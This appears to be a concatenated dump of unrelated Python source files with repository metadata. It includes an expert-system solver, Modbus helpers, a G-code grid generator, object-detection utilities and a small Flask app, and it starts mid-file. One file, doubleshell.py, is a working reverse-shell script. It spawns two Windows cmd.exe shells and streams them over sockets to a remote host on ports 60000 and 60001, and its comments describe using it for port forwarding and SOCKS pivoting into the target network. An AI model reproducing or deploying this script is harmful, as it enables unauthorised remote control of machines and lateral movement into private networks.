values.append(distance)
sum = 0
for distance in values:
sum += distance
print "Min: %d" % min
print "Max: %d" % max
print "Average: %d" % (sum / len(values))
| true
|
a2287de3d421d414fc08d250b231995110ff1e61
|
Python
|
Nisarg851/python-socket
|
/server.py
|
UTF-8
| 2,098
| 3.09375
| 3
|
[] |
no_license
|
import socket
import threading
port = 5050
ip = socket.gethostbyname(socket.gethostname()) #gets the IP of Host machine
print(ip)
addr = (ip,port)
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #creates a socket-> family AF_INET(IPV4) and SOCK_STREAM(TCP)
server.bind(addr) #binds the socket with IP and port
def handle_client(conn,client): #method to handle each client on different thread
print(f"{client} connected")
connected = True
while connected:
msg_length = conn.recv(100).decode("utf-8") #recieves and decode the message length (note the length<=100)
if msg_length=="":
continue
elif len(msg_length)>100:
print("message too long")
else:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode("utf-8") #recieves and decode the actual message
print(msg)
            if msg == "disconnect": # if the message received is "disconnect", the connection is closed
connected = False
print(f"{client} disconnected")
msg_client = input()
msg_client_length = len(msg_client)
msg_client_length = str(msg_client_length) + f" "*(100-msg_client_length)
msg_client_length = msg_client_length.encode('utf-8')
msg_client = msg_client.encode('utf-8')
conn.send(msg_client_length)
conn.send(msg_client)
conn.close()
def start(): #method that creates different thread for each client
server.listen() #listens for the client that wants to connect
print("Waiting for client(s) to connect...")
while True:
conn,client_addr=server.accept()
client = threading.Thread(target=handle_client,args=(conn,client_addr))
client.start()
print("Starting server...")
start()
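# Client-side sketch (illustrative, not part of this file): a peer must send a
# 100-byte space-padded length header followed by the UTF-8 message body, e.g.
#   client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   client.connect((ip, port))
#   body = "hello".encode("utf-8")
#   client.send(str(len(body)).ljust(100).encode("utf-8"))
#   client.send(body)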
| true
|
91783969f8fa1636ea764aa75208f75f07f03f3e
|
Python
|
Rutie2Techie/Hello_python
|
/function/map_sqaure.py
|
UTF-8
| 363
| 4.09375
| 4
|
[] |
no_license
|
#calculate square of numbers using map function
def calsquare(num):
return num*num
number=[2,4,6,8]
result=map(calsquare,number)
print(result)
#converting map object to tuple
numsquare=tuple(result)
print(numsquare)
#
#number=[2,4,6,8]
#result=map(lambda x:x*x,number)
#print(result)
#converting map object to tuple
#numsquare=tuple(result)
#print(numsquare)
| true
|
2acdab00919d22308085a7ac53981cc880edb525
|
Python
|
ptyshevs/expert_system
|
/es.py
|
UTF-8
| 13,585
| 3.421875
| 3
|
[] |
no_license
|
import argparse
import string
import sys
from Fact import Fact
class Operator:
precedence_map = {'<=>': 1, '=>': 2, '^': 3, '|': 4, '+' : 5, '!': 6, '=': 0}
# assoc_map = {'+': 'left', '-': 'left', '*': 'left', '/': 'left', '%': 'left',
# '^': 'right', '=': 'right', '**': 'left', '?': 'left'}
def __init__(self, op):
self.op = op
self.name = op
self.n_operands = 2 if op != '!' else 1
self.precedence = self.precedence_map[op]
def eval(self, l, r=None, **kwargs):
if type(l) is Fact:
l = l.value
if type(r) is Fact:
r = r.value
if self.op == '+':
return l & r
elif self.op == '!':
return not l
elif self.op == '|':
return r | l
elif self.op == '^':
return r ^ l
return r
def __repr__(self):
return self.op
def expand_tokens(tokens):
exp = []
n = len(tokens)
i = 0
while i < n:
tk = tokens[i]
if tk in '()':
exp.append(tk)
elif tk in '!+|^':
exp.append(Operator(tk))
elif tk == '<':
if i < n - 2 and tokens[i+1] == '=' and tokens[i+2] == '>':
exp.append(Operator('<=>'))
i += 2
else:
raise ValueError(f"Invalid token: {tk}")
elif tk == '=':
if i < n - 1 and tokens[i+1] == '>':
exp.append(Operator('=>'))
i += 1
else:
exp.append(Operator('='))
elif tk in string.ascii_uppercase:
exp.append(Fact(tk))
else:
raise ValueError(f'Invalid token: {tk}')
i += 1
return exp
def infix_to_rpn(expr):
operators = [] # Stack
output = [] # Queue
# print("INFIX TO RPN")
while expr:
tk = expr.pop(0)
# print(f'tk={tk}, type={type(tk)}')
if type(tk) is Fact:
output.append(tk)
elif type(tk) is Operator:
while True:
if len(operators) == 0:
break
head = operators[-1]
if head == '(':
break
elif type(head) is Operator and head.precedence >= tk.precedence:
output.append(operators.pop())
else:
break
operators.append(tk)
elif tk == '(':
operators.append(tk)
elif tk == ')':
found_bracket = False
while True:
if len(operators) == 0:
break
head = operators[-1]
if head == '(':
found_bracket = True
break
output.append(operators.pop())
if not found_bracket:
raise ValueError("Mismatched parentheses")
assert operators[-1] == '('
operators.pop()
while operators:
op = operators.pop()
if op in ['(', ')']:
raise ValueError("Mismatched parentheses")
output.append(op)
return output
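# Example (illustrative): the rule text "A + B => C" expands to the token list
# [A, +, B, =>, C] and converts to the RPN queue [A, B, +, C, =>], because '+'
# (precedence 5) binds tighter than '=>' (precedence 2).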
def evaluate_rpn(rpn, facts, rules, verbose=False):
eval_stack = []
while rpn:
val = rpn.pop(0)
if type(val) is Fact:
res = resolve_query(rules, facts, val, verbose=verbose)
if res is None:
val.value = False
else:
val = res
eval_stack.append(val)
elif type(val) is Operator:
n_op = val.n_operands
if not eval_stack:
raise ValueError(f"Not enough operands to perform calculation | Operator {val} ({type(val)})")
op = eval_stack.pop()
# op = resolve_query(rules, facts, op, verbose=True)
if n_op == 1:
r = val.eval(op)
eval_stack.append(r)
else:
if not eval_stack:
raise ValueError(f"Not enough operands to perform calculation | Operator {val}, op1 {op}")
else:
op2 = eval_stack.pop()
# op2 = resolve_query(rules, facts, op2, verbose=True)
eval_stack.append(val.eval(op, op2))
else:
raise NotImplementedError(val, type(val))
if len(eval_stack) != 1:
raise ValueError("Expression doesn't evaluate to a single value")
# print("EVAL STACK:", eval_stack)
res = eval_stack[0]
if type(res) is bool:
return res
elif type(res) is Fact:
return res.value
return res
def evaluate(inp, verbose=False, return_rpn=False):
tokens = ''.join(c for c in inp.split(" ") if c)
if verbose:
print("TOKENS:", tokens)
exp = expand_tokens(tokens)
if verbose:
print("EXPANDED:", exp)
rpn = infix_to_rpn(exp)
if verbose:
print("RPN:", rpn)
if return_rpn:
return rpn
res = evaluate_rpn(rpn, env)
if verbose:
print("EVAL RESULT:", res)
return res
def parse_file(f):
lines = []
for line in f:
if line.endswith("\n"):
line = line[:-1]
if line.startswith("#"):
continue
elif not line:
continue
tokens = [c for c in line.split(" ") if c]
if len(tokens) == 0:
continue
full = True
for i in range(len(tokens)):
if tokens[i].startswith("#"):
full = False
r = " ".join(tokens[:i])
if r:
lines.append(r)
break
if full:
lines.append(" ".join(tokens))
return lines
def parse_rule(rule, facts):
tokens = ''.join(c for c in rule.split(" ") if c)
exp = expand_tokens(tokens)
lhs, consequence, rhs = [], None, []
is_lhs = True
for t in exp:
if type(t) is Fact:
if t.name in facts:
t = facts[t.name]
else:
facts[t.name] = t
if not is_lhs:
t.atomic = False
if type(t) is str and t in ['=>', '<=>']:
consequence = t
is_lhs = False
elif type(t) is not str and t.name in ['=>', '<=>']:
consequence = t
is_lhs = False
elif is_lhs:
lhs.append(t)
else:
rhs.append(t)
if len(lhs) == 0:
raise ValueError(f"{rule}: Empty LHS")
elif len(rhs) == 0:
raise ValueError(f"{rule}: Empty RHS")
elif consequence is None:
raise ValueError(f"{rule}: Consequence is not understood")
return lhs, consequence, rhs
def validate_input(lines):
if len(lines) < 2:
raise ValueError("Input is insufficient for proper working")
rules, init_facts, query = lines[:-2], lines[-2], lines[-1]
if not query.startswith("?") or not all(c in string.ascii_uppercase for c in query[1:]):
raise ValueError("Invalid query:", query)
else:
query = query[1:]
if not init_facts.startswith("=") or not all(c in string.ascii_uppercase for c in init_facts[1:]):
raise ValueError("Invalid initial facts:", init_facts)
else:
init_facts = init_facts[1:]
facts = dict() # List of all known facts, either atomic or complex
rules_parsed = []
for rule in rules:
rules_parsed.append(parse_rule(rule, facts))
return rules_parsed, init_facts, facts, query
def initialize_facts(init_facts, facts):
# Resetting facts (I need this for interactive evaluation)
for f in facts.values():
if f.atomic:
f.value = None
for f in init_facts:
if f not in facts:
print(f"Initial fact {f} doesn't exist in graph")
continue
else:
fact = facts[f]
if not fact.atomic:
fact.atomic = True
fact.value = True
for f in facts.values():
if f.atomic and f.value is None:
f.value = False
def solve_rhs(facts, rhs, res, query, verbose=False):
if verbose:
print("RHS:", rhs, "as:", res)
if res is None:
return res
elif len(rhs) == 1:
t = rhs[0]
if type(t) is Fact:
return res
elif len(rhs) == 2:
op, val = rhs
if op.name == '!':
return not res
else:
raise ValueError("Invalid RHS:", rhs)
elif len(rhs) == 3:
a, op, b = rhs
        second = b if query == a else a  # the operand other than the queried fact
if op.name == '+':
if res is True:
return True
else:
if second is False:
return True
else:
return None
else:
raise ValueError("Invalid RHS:", rhs)
def resolve_query(rules, facts, f, verbose=False, stack=[]):
if f in stack:
return None
else:
stack.append(f)
result = None
if verbose:
print("Resolving query:", f)
if type(f) is bool:
return f
if f.atomic:
result = f.value
else:
# Resolving among complex
rules_with_rhs = [r for r in rules if f in r[2]]
if verbose:
print("RULES WITH RHS:", rules_with_rhs)
for r in rules_with_rhs:
lhs, cons, rhs = r[0][:], r[1], r[2][:]
if f in lhs:
print("Recursion attempted")
continue
rpn = infix_to_rpn(lhs)
if verbose:
print("RPN:", rpn)
evaluated_lhs = evaluate_rpn(rpn, facts, rules)
if verbose:
print("LHS EVAL:", evaluated_lhs, "is None:", evaluated_lhs is None)
if evaluated_lhs is None:
if verbose:
print("Continued")
continue
elif cons.name == '=>':
if verbose:
print("Resolving implication")
if evaluated_lhs is True:
result = solve_rhs(facts, rhs, True, f, verbose=verbose)
else:
if verbose:
print("Proposition is False, moving on")
continue
elif cons.name == '<=>':
if verbose:
print("Resolving equivalence")
result = solve_rhs(facts, rhs, evaluated_lhs, f, verbose=verbose)
else:
raise ValueError("Invalid consequence operator", cons)
stack.pop()
return result
def resolve_queries(rules, facts, queries, args):
for q in queries:
if q not in facts:
print(f"Query is not understood: {q}")
continue
f = facts[q]
res = resolve_query(rules, facts, f, args.verbose)
if res is None:
res = False
print(f"Q[{q}]: {res}")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--interactive', '-i', default=False, action='store_true', help='interactive mode')
parser.add_argument('--file', '-f', default=None, help='File to read')
parser.add_argument('--natural', '-n', default=True, action='store_true', help='more natural input')
parser.add_argument('--verbose', '-v', default=False, action='store_true', help='more verbose evaluation')
parser.add_argument('--strict', '-s', default=False, action='store_true', help='Be strict when ambiguous (None->False converter)')
args = parser.parse_args()
env = []
if args.interactive:
rules, init_facts, facts, queries = [], "", dict(), ""
while True:
inp = input("> ")
if args.natural:
inp = inp.upper()
if inp.lower() == 'q' or inp.lower() == 'quit':
break
elif inp.lower() == 'facts':
print(facts)
continue
elif inp.lower() == 'rules':
print(rules)
continue
elif inp.lower() == 'exec':
if args.verbose:
print(f"QUERIES NOW: |{queries}| | RULES: {rules}")
initialize_facts(init_facts, facts)
resolve_queries(rules, facts, queries, args)
else:
try:
if not inp:
continue
if inp.startswith("="):
init_facts = inp[1:]
elif inp.startswith("?"):
queries = inp[1:].strip()
else:
rules.append(parse_rule(inp, facts))
except ValueError as e:
print(e)
else:
if args.file is not None:
try:
f = open(args.file)
except ValueError:
print("No such file. Nice try")
exit(1)
else:
f = sys.stdin
try:
proper_input = parse_file(f)
# print("PROP INPUT:")
rules, init_facts, facts, queries = validate_input(proper_input)
initialize_facts(init_facts, facts)
if args.verbose:
print("RULES", rules)
print("INIT FACTS:", init_facts)
print("FACTS:", facts)
print("QUERIES:", queries)
resolve_queries(rules, facts, queries, args)
except ValueError as e:
print(e)
exit(1)
| true
|
97b58a9e05c619791170611b744ffc47de502e5f
|
Python
|
lg0killer/goodwe
|
/goodwe/modbus.py
|
UTF-8
| 2,913
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
import logging
from typing import Union
logger = logging.getLogger(__name__)
MODBUS_READ_CMD: int = 0x3
MODBUS_WRITE_CMD: int = 0x6
MODBUS_WRITE_MULTI_CMD: int = 0x10
def _create_crc16_table() -> tuple:
"""Construct (modbus) CRC-16 table"""
table = []
for i in range(256):
buffer = i << 1
crc = 0
for _ in range(8, 0, -1):
buffer >>= 1
if (buffer ^ crc) & 0x0001:
crc = (crc >> 1) ^ 0xA001
else:
crc >>= 1
table.append(crc)
return tuple(table)
_CRC_16_TABLE = _create_crc16_table()
def _modbus_checksum(data: Union[bytearray, bytes]) -> int:
"""
Calculate modbus crc-16 checksum
"""
crc = 0xFFFF
for ch in data:
crc = (crc >> 8) ^ _CRC_16_TABLE[(crc ^ ch) & 0xFF]
return crc
def create_modbus_request(comm_addr: int, cmd: int, offset: int, value: int) -> bytes:
"""
Create modbus request.
data[0] is inverter address
data[1] is modbus command
data[2:3] is command offset parameter
data[4:5] is command value parameter
data[6:7] is crc-16 checksum
"""
data: bytearray = bytearray(6)
data[0] = comm_addr
data[1] = cmd
data[2] = (offset >> 8) & 0xFF
data[3] = offset & 0xFF
data[4] = (value >> 8) & 0xFF
data[5] = value & 0xFF
checksum = _modbus_checksum(data)
data.append(checksum & 0xFF)
data.append((checksum >> 8) & 0xFF)
return bytes(data)
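# Example (illustrative): a request to read 2 registers starting at offset 0x88B8
# from the device at address 0xF7 would be built as
#   create_modbus_request(0xF7, MODBUS_READ_CMD, 0x88B8, 2)
# giving the 8-byte frame F7 03 88 B8 00 02 followed by the CRC-16 low and high bytes.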
def validate_modbus_response(data: bytes, cmd: int, offset: int, value: int) -> bool:
"""
Validate the modbus response.
data[0:1] is header
data[2] is source address
data[3] is command return type
data[4] is response payload length (for read commands)
data[-2:] is crc-16 checksum
"""
if len(data) <= 4:
logger.debug(f'Response is too short.')
return False
if data[3] != cmd:
logger.debug(f'Response returned command failure: {data[3]}, expected {cmd}.')
return False
if data[3] == MODBUS_READ_CMD:
if data[4] != value * 2:
logger.debug(f'Response has unexpected length: {data[4]}, expected {value * 2}.')
return False
expected_length = data[4] + 7
if len(data) < expected_length:
logger.debug(f'Response is too short: {len(data)}, expected {expected_length}.')
return False
elif data[3] == MODBUS_WRITE_CMD:
if len(data) < 10:
logger.debug(f'Response has unexpected length: {len(data)}, expected {10}.')
return False
expected_length = 10
else:
expected_length = len(data)
checksum_offset = expected_length - 2
if _modbus_checksum(data[2:checksum_offset]) != ((data[checksum_offset + 1] << 8) + data[checksum_offset]):
logger.debug(f'Response CRC-16 checksum does not match.')
return False
return True
| true
|
d3f32a9b72e8e742a8e69e553e72a7622250981f
|
Python
|
ademuri/x-carve-tools
|
/spoilboard/generate_grid.py
|
UTF-8
| 1,592
| 2.640625
| 3
|
[] |
no_license
|
f = open("grid.nc", "w")
width = 700
height = 700
grid_spacing = 10
major_label_spacing = 50
tick_height = 5
offset_x = 14
offset_y = 18
feed_rate = 1500
z_high = 5
z_low = 0
f.write("; Y lines\n")
forward = True
for x in range(offset_x, width + offset_x + grid_spacing, grid_spacing):
f.write(f"G00 Z{z_high}\n")
y_start = offset_y
feed = feed_rate
if (x - offset_x) % major_label_spacing == 0:
y_start = y_start - tick_height
feed = feed_rate * 0.3
if forward:
f.write(f"G00 X{x} Y{y_start}\n")
f.write(f"G01 Z{z_low} F{feed_rate}\n")
f.write(f"G01 X{x} Y{offset_y + height} F{feed}\n")
else:
f.write(f"G00 X{x} Y{offset_y + height}\n")
f.write(f"G01 Z{z_low} F{feed_rate}\n")
f.write(f"G01 X{x} Y{y_start} F{feed}\n")
f.write(f"G00 Z{z_high}\n")
f.write("\n")
forward = not forward
f.write("\n; X lines\n")
for y in range(offset_y, height + offset_y + grid_spacing, grid_spacing):
f.write(f"G00 Z{z_high}\n")
x_start = offset_x
feed = feed_rate
if (y - offset_y) % major_label_spacing == 0:
x_start = x_start - tick_height
feed = feed_rate * 0.3
if forward:
f.write(f"G00 X{x_start} Y{y}\n")
f.write(f"G01 Z{z_low} F{feed}\n")
f.write(f"G01 X{offset_x + width} Y{y} F{feed}\n")
else:
f.write(f"G00 X{offset_x + width} Y{y}\n")
f.write(f"G01 Z{z_low} F{feed_rate}\n")
f.write(f"G01 X{x_start} Y{y} F{feed}\n")
f.write(f"G00 Z{z_high}\n")
f.write("\n")
forward = not forward
f.close()
| true
|
9d8e2da75dd78c206151ef561721026117fe4e33
|
Python
|
Cloudxtreme/dssaas
|
/dss-side-scripts/gen_zipf_dist_jmeter.py
|
UTF-8
| 573
| 2.6875
| 3
|
[
"Apache-2.0"
] |
permissive
|
import numpy as np
import os
from subprocess import call
maxfilename = 200
maxnumfiles = 200 # num files tbc
param = 1.1
s = np.random.zipf(param, maxnumfiles*3)
call(["touch", "filenames.txt"])
f = open('filenames.txt', 'w')
created = 0
i=0
while created < maxnumfiles:
if (int(s[i])<=maxfilename):
f.write(str(s[i])+"\n")
created = created + 1
if (i % 10 == 0):
print "Working: " +str(int((float(created)/float(maxnumfiles))*100.0)) + "% completed"
i = i + 1
print "done"
f.close()
| true
|
de4b31c35f5536edc86abffde6a305cecd7597a8
|
Python
|
paulyyi/Scripts
|
/doubleshell.py
|
UTF-8
| 1,686
| 2.71875
| 3
|
[] |
no_license
|
#creates 2 shells on target
#one is used to setup a remore port forward using plink, which will kill the shell
#the other can be used to setup a socks proxy with powershell, to pivot into target network
import os,socket,subprocess,threading;
def ss2pp(ss, pp):
while True:
data = ss.recv(1024)
if len(data) > 0:
pp.stdin.write(data)
def pp2ss(ss, pp):
while True:
ss.send(pp.stdout.read(1))
ss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
ss.connect(("10.0.0.0",60000))
pp=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
ss2pp_thread = threading.Thread(target=ss2pp, args=[ss, pp])
ss2pp_thread.daemon = True
ss2pp_thread.start()
pp2ss_thread = threading.Thread(target=pp2ss, args=[ss, pp])
pp2ss_thread.daemon = True
pp2ss_thread.start()
def s2p(s, p):
while True:
data = s.recv(1024)
if len(data) > 0:
p.stdin.write(data)
def p2s(s, p):
while True:
s.send(p.stdout.read(1))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.0.0",60001))
p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
pp.wait()
except KeyboardInterrupt:
s.close()
ss.close()
| true
|
f85cbd4b1f640f4ae5c2e24188d42a4116784a33
|
Python
|
chuckma/pythondemo
|
/collections/chaper2/tuple_test.py
|
UTF-8
| 520
| 3.578125
| 4
|
[] |
no_license
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 11:27
# @Author : Administrator
# @Site :
# @File : tuple_test
# @Software: PyCharm
name_tuple = ("boy1", "boy2")
# tuple unpacking
user_tuple = ("bobb1", 24, 170, "杭州",)
# name, age, height = user_tuple
name, *other = user_tuple
print(name, other)
# tuple immutability is not absolute
# avoid putting mutable objects in a tuple; the list below is mutable
name_tuple = ("boy2", [2,3],)
name_tuple[1].append(4)
print(name_tuple)
| true
|
f083b2cb4d97d19387a4984eb8e95e3eea2d61f2
|
Python
|
patrickhop/tc
|
/enlitic_1.py
|
UTF-8
| 1,304
| 3
| 3
|
[] |
no_license
|
# find min-subsequence of length two s.t elements of subsequence are non-adjacent
# endpoints aren't of interest. we can safely exclude them from sequence, and base-case computation
# n = 1 (no sol: no subsequence of length two)
# n = 2 (no sol: elements of subsequence must be adjacent)
# n = 3 (sol : opt = [(A_0, 0), (A_2, 2)]) => Base Case... sol contains all data need to compute optimality
# n = n + 1 (sol: produce new-subsequence that is optimal for n + 1
def solution(A):
A = A[1:-1] # endpoints are not of interest to us
opt = [(A[0], 0), (A[2], 2)] # Base case
for i in xrange(3, len(A)):
if A[i] < opt[0][0] and A[i] < opt[1][0]:
            if i - 1 != opt[1][1]:  # new index is not adjacent to the current second element
# not adj
if opt[0][0] >= opt[1][0]:
opt[0] = opt[1]
opt[1] = (A[i], i)
else:
opt[1] = (A[i], i)
else:
# is adj
opt[1] = (A[i], i)
elif A[i] < opt[1][0]:
# adjacency doesn't matter
opt[1] = (A[i], i)
        elif A[i] < opt[0][0] and (i - 1 != opt[1][1]):
# if it's adjacent, we can't replace first element
opt[0] = opt[1]
opt[1] = (A[i], i)
return opt[0][0] + opt[1][0]
| true
|
3788accd6569f334e6db1621347bb236292f6227
|
Python
|
CatarauCorina/creativai
|
/finetune_fasterrcnn/utils.py
|
UTF-8
| 6,780
| 2.96875
| 3
|
[] |
no_license
|
import torch
def non_max_suppression(prediction, num_classes, conf_thres=0.5, nms_thres=0.4):
"""
Removes detections with lower object confidence score than 'conf_thres' and performs
Non-Maximum Suppression to further filter detections.
Returns detections with shape:
(x1, y1, x2, y2, object_conf, class_score, class_pred)
"""
# From (center x, center y, width, height) to (x1, y1, x2, y2)
box_corner = prediction.new(prediction.shape)
box_corner[:, :, 0] = prediction[:, :, 0] - prediction[:, :, 2] / 2
box_corner[:, :, 1] = prediction[:, :, 1] - prediction[:, :, 3] / 2
box_corner[:, :, 2] = prediction[:, :, 0] + prediction[:, :, 2] / 2
box_corner[:, :, 3] = prediction[:, :, 1] + prediction[:, :, 3] / 2
prediction[:, :, :4] = box_corner[:, :, :4]
output = [None for _ in range(len(prediction))]
for image_i, image_pred in enumerate(prediction):
# Filter out confidence scores below threshold
conf_mask = (image_pred[:, 4] >= conf_thres).squeeze()
image_pred = image_pred[conf_mask]
# If none are remaining => process next image
if not image_pred.size(0):
continue
# Get score and class with highest confidence
class_conf, class_pred = torch.max(image_pred[:, 5 : 5 + num_classes], 1, keepdim=True)
# Detections ordered as (x1, y1, x2, y2, obj_conf, class_conf, class_pred)
detections = torch.cat((image_pred[:, :5], class_conf.float(), class_pred.float()), 1)
# Iterate through all predicted classes
unique_labels = detections[:, -1].cpu().unique()
if prediction.is_cuda:
unique_labels = unique_labels.cuda()
for c in unique_labels:
# Get the detections with the particular class
detections_class = detections[detections[:, -1] == c]
# Sort the detections by maximum objectness confidence
_, conf_sort_index = torch.sort(detections_class[:, 4], descending=True)
detections_class = detections_class[conf_sort_index]
# Perform non-maximum suppression
max_detections = []
while detections_class.size(0):
# Get detection with highest confidence and save as max detection
max_detections.append(detections_class[0].unsqueeze(0))
# Stop if we're at the last detection
if len(detections_class) == 1:
break
# Get the IOUs for all boxes with lower confidence
ious = bbox_iou(max_detections[-1], detections_class[1:])
# Remove detections with IoU >= NMS threshold
detections_class = detections_class[1:][ious < nms_thres]
max_detections = torch.cat(max_detections).data
# Add max detections to outputs
output[image_i] = (
max_detections if output[image_i] is None else torch.cat((output[image_i], max_detections))
)
return output
def bbox_iou(box1, box2, x1y1x2y2=True):
"""
Returns the IoU of two bounding boxes
"""
if not x1y1x2y2:
# Transform from center and width to exact coordinates
b1_x1, b1_x2 = box1[:, 0] - box1[:, 2] / 2, box1[:, 0] + box1[:, 2] / 2
b1_y1, b1_y2 = box1[:, 1] - box1[:, 3] / 2, box1[:, 1] + box1[:, 3] / 2
b2_x1, b2_x2 = box2[:, 0] - box2[:, 2] / 2, box2[:, 0] + box2[:, 2] / 2
b2_y1, b2_y2 = box2[:, 1] - box2[:, 3] / 2, box2[:, 1] + box2[:, 3] / 2
else:
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[:, 0], box1[:, 1], box1[:, 2], box1[:, 3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[:, 0], box2[:, 1], box2[:, 2], box2[:, 3]
    # get the coordinates of the intersection rectangle
inter_rect_x1 = torch.max(b1_x1, b2_x1)
inter_rect_y1 = torch.max(b1_y1, b2_y1)
inter_rect_x2 = torch.min(b1_x2, b2_x2)
inter_rect_y2 = torch.min(b1_y2, b2_y2)
# Intersection area
inter_area = torch.clamp(inter_rect_x2 - inter_rect_x1 + 1, min=0) * torch.clamp(
inter_rect_y2 - inter_rect_y1 + 1, min=0
)
# Union Area
b1_area = (b1_x2 - b1_x1 + 1) * (b1_y2 - b1_y1 + 1)
b2_area = (b2_x2 - b2_x1 + 1) * (b2_y2 - b2_y1 + 1)
iou = inter_area / (b1_area + b2_area - inter_area + 1e-16)
return iou
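# Worked example (illustrative, using the +1 pixel convention above):
#   a = torch.tensor([[0., 0., 10., 10.]])
#   b = torch.tensor([[5., 5., 15., 15.]])
#   bbox_iou(a, b)  # intersection 6*6 = 36, union 121 + 121 - 36 = 206 -> ~0.175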
def nms(boxes, scores, overlap=0.5, top_k=200):
"""Apply non-maximum suppression at test time to avoid detecting too many
overlapping bounding boxes for a given object.
Args:
boxes: (tensor) The location preds for the img, Shape: [num_priors,4].
scores: (tensor) The class predscores for the img, Shape:[num_priors].
overlap: (float) The overlap thresh for suppressing unnecessary boxes.
top_k: (int) The Maximum number of box preds to consider.
Return:
The indices of the kept boxes with respect to num_priors.
"""
keep = scores.new(scores.size(0)).zero_().long()
if boxes.numel() == 0:
return keep
x1 = boxes[:, 0]
y1 = boxes[:, 1]
x2 = boxes[:, 2]
y2 = boxes[:, 3]
area = torch.mul(x2 - x1, y2 - y1)
v, idx = scores.sort(0) # sort in ascending order
# I = I[v >= 0.01]
idx = idx[-top_k:] # indices of the top-k largest vals
xx1 = boxes.new()
yy1 = boxes.new()
xx2 = boxes.new()
yy2 = boxes.new()
w = boxes.new()
h = boxes.new()
# keep = torch.Tensor()
count = 0
while idx.numel() > 0:
i = idx[-1] # index of current largest val
# keep.append(i)
keep[count] = i
count += 1
if idx.size(0) == 1:
break
idx = idx[:-1] # remove kept element from view
# load bboxes of next highest vals
torch.index_select(x1, 0, idx, out=xx1)
torch.index_select(y1, 0, idx, out=yy1)
torch.index_select(x2, 0, idx, out=xx2)
torch.index_select(y2, 0, idx, out=yy2)
# store element-wise max with next highest score
xx1 = torch.clamp(xx1, min=x1[i])
yy1 = torch.clamp(yy1, min=y1[i])
xx2 = torch.clamp(xx2, max=x2[i])
yy2 = torch.clamp(yy2, max=y2[i])
w.resize_as_(xx2)
h.resize_as_(yy2)
w = xx2 - xx1
h = yy2 - yy1
# check sizes of xx1 and xx2.. after each iteration
w = torch.clamp(w, min=0.0)
h = torch.clamp(h, min=0.0)
inter = w*h
# IoU = i / (area(a) + area(b) - i)
rem_areas = torch.index_select(area, 0, idx) # load remaining areas)
union = (rem_areas - inter) + area[i]
IoU = inter.float()/union.float() # store result in iou
# keep only elements with an IoU <= overlap
idx = idx[IoU.le(overlap)]
return keep, count
| true
|
fcfb3af8cc947cff30931573c8959a73c560248b
|
Python
|
Treinamento-Stefa-IA-DevOps/treinamento-dia-04-08-vitorrangelcs
|
/docker_tutorial/flask_example/app/flask_app.py
|
UTF-8
| 608
| 2.953125
| 3
|
[] |
no_license
|
from flask import Flask
import os
import psycopg2
app = Flask(__name__)
@app.route('/')
def hello_world():
    with psycopg2.connect(f"dbname={os.getenv('DB_NAME')} user={os.getenv('DB_USER')} password={os.getenv('DB_PASS')}") as conn:
cur = conn.cursor()
cur.execute("SELECT * FROM test;")
        rows = cur.fetchall()  # returns the result as tuples, where each item in the tuple is one column's value
message = ''
for row in rows:
            message = message + row[1]  # take the element at index 1 of the returned tuple
return message + " Direto de meu belo database!!"
| true
|
7a2e6b7d930c42d4015919a49bfeae1d9bed45fe
|
Python
|
jasdeep06/improving_python
|
/importSaga/code/sizeFunction.py
|
UTF-8
| 926
| 3.15625
| 3
|
[] |
no_license
|
import os
import sys
suffixes={1000:["KB","MB","GB","TB"],
1024:["KiB","MiB","GiB","TiB"]}
def approximate_size(filePath,yardstickIs1024=True):
"""
Returns approximate size of the file at file_path
:param filePath:path of the file
:param yardstickIs1024: 1kb=1024 bytes or 1000 bytes
:return: size of the file
"""
if not os.path.exists(filePath):
        raise FileNotFoundError("The file you requested does not exist.")
sizeOfFile=os.path.getsize(filePath)
yardstick = 1024 if yardstickIs1024 else 1000
for suffix in suffixes[yardstick]:
sizeOfFile = sizeOfFile / yardstick
if sizeOfFile > yardstick:
continue
else:
return '{0:.1f} {1}'.format(sizeOfFile,suffix)
#if __name__=="__main__":
# print(approximate_size("/Users/jasdeepsinghchhabra/improving_python/importSaga/dataAndCaller/data/video.mp4",True))
| true
|
292eec2d9faea3e11e5199176f937491d3a0f59c
|
Python
|
BobbyHughes17/Blogz
|
/models.py
|
UTF-8
| 1,119
| 2.734375
| 3
|
[] |
no_license
|
from app import db,app
import hashlib
from datetime import datetime
class User(db.Model):
id = db.Column(db.Integer, primary_key = True)
user_name = db.Column(db.String(120), unique = True,nullable = True)
pw_hash = db.Column(db.String(120),nullable = False)
blogz = db.relationship('Blog',backref='owner')
def __init__(self,user_name,password):
self.user_name = user_name
self.pw_hash = make_pw_hash(password)
class Blog(db.Model):
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(120), nullable = False, unique = True)
body = db.Column(db.Text)
date_created = db.Column(db.DateTime)
owner_id = db.Column(db.Integer,db.ForeignKey('user.id'),nullable = False)
def __init__(self,title,body,owner):
self.title = title
self.body = body
self.date_created = datetime.now()
self.owner = owner
def make_pw_hash(password):
return hashlib.sha256(str.encode(password)).hexdigest()
def check_pw_hash(password,hash):
if make_pw_hash(password) == hash:
return True
return False
| true
|
57e97a41a808f1ee371ca64e84e25b6052c88458
|
Python
|
slacgismo/solar-data-tools
|
/pvsystemprofiler/algorithms/angle_of_incidence/lambda_functions.py
|
UTF-8
| 3,230
| 3.125
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
"""
This module is used to set the hour_angle_equation in terms of the unknowns. The hour equation is a function of the
